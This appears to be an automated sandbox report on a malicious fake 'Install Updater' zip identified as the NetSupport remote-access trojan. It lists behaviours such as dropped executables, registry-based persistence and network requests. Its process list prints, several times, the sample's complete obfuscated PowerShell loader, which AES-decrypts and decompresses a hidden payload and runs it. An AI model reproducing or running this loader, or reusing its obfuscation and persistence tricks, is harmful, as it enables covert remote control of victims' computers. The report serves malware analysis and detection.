Analysis Overview
SHA256
ab08ba5cb3eb0ef2cffeecefe99023bf0f080f19cfe0187892f5b08f41345e39
Threat Level: Known bad
The file Install Updater (V104.551.2)-stable.zip was found to be: Known bad.
Malicious Activity Summary
NetSupport
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Drops file in System32 directory
Enumerates physical storage devices
Kills process with taskkill
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-07-18 03:25
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-18 03:25
Reported
2023-07-18 03:30
Platform
win10v2004-20230703-en
Max time kernel
141s
Max time network
206s
Command Line
Signatures
NetSupport
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E} | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Roaming\\IonicBaseband\\client32.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Install Updater (V104.551.2)-stable.zip"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Install Updater (V104.551.2)-stable.zip\Install Updater (V104.551.2)-stable.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell - }
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe $uGSyEn = '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